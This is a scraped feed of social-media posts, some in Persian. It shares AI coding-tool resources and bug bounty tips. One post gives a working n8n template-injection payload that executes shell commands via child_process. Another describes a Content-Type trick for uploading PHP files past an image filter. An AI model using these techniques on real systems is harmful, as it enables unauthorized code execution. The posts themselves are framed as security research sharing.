راهنمای فارسی Hermes Agent رسید!
یه مخزن تو گیتهاب درست کردم و کل داکیومنت هرمس رو با Mimo V2.5 به فارسی ترجمه کردم.
لینک پیچ راهنمای فارسی: https://t.co/FfSBAM9ss9
اگر لذت بردید حتما تو گیتهاب ستاره بدید:
https://t.co/nNRJoByueO
🚀 اگر دوست داری Claude برات مثل یه Senior Software Engineer واقعی کد بزنه (نه فقط vibe coding)، این مجموعه Skills از Matt Pocock رو بهش بده!
مجموعهای از مهارتهای حرفهای:
Architecture
TDD
Refactoring
Code Review
و مهارتهای سطح بالا
https://t.co/OTxL7e7KQR
Hunters spend hours on subdomain enumeration before opening the actual app. The bugs that pay live on the app you haven't opened yet.
In this video, I show the exact recon process I use on every new target. No tool chain. Just the application, my proxy, and a way of reading what I see that pulls bugs out on almost every program.
How I Do Recon in 2026? https://t.co/uFv0kzQ7eZ
#BugBounty #Recon #WebSecurity #EthicalHacking #AmrSec #BrokenAccessControl
دیروز خیلیا ازم خواستن ریسورس هایی که برای Claude Code میبینم رو اینجا به اشتراک بذارم.
برای شروع و اگه فقط در حد پرامپت بلدید با کلاود کار کنید، به نظرم اینا خوبه:
1. یه کورس 4 ساعته کامل
https://t.co/rVDvBJGnrE
2. یه گیت هاب فول آموزشی
https://t.co/RXlpZZ3Sor
با اینا شروع کنید
If you're using Nuclei but not leveraging community templates, you're leaving bugs on the table 👀
The Nuclei-Templates-Collection is a curated hub of custom templates to supercharge your scans, from CVEs to real-world bug bounty cases.
More templates = more coverage = more findings 🔥
🔗 https://t.co/R1XkF0Az1n
#BugBounty #Nuclei #Infosec #AppSec #CyberSecurity
Zero Click Unauthenticated RCE in n8n (CVE-2026-27493)
The chain exploitation method is:
Allow User input
SSTI exploitation e.g. {{7*7}}
={{$node["NodeName"].constructor.constructor('return process.mainModule.require("child_process").execSync("id ").toString()')()}}
I recently identified an interesting technique to bypass file upload restrictions by manipulating the Content-Type header.
The target application enforced an image-only upload policy. Initial attempts to upload a file with a modified Content-Type such as application/html were correctly rejected. However, setting the header to application/jpeg allowed the upload to succeed, despite no validation of the actual file content.
Further testing revealed inconsistent parsing behavior. When using application/text php/jpeg, the uploaded file was assigned a .txtphp extension, indicating that the server was partially deriving the extension from the MIME type in an unsafe manner.
By refining this approach and setting the Content-Type to application/ php/jpeg, I was able to bypass the extension filtering mechanism entirely and upload a PHP file.
In this case, the impact was limited because the file was served via CloudFront, preventing remote code execution. Nonetheless, this behavior highlights weak MIME type validation and unsafe extension handling, which could lead to critical impact in different configurations.
Sharing this technique as it may be useful in similar upload validation scenarios.
You can now dump all your #bugbounty@Hacker0x01 reports using bbscope thanks to @R3dTr4p's pull request!
bbscope reports h1 --output-dir h1-reports
More platforms coming soon!
https://t.co/nwPumNPLNr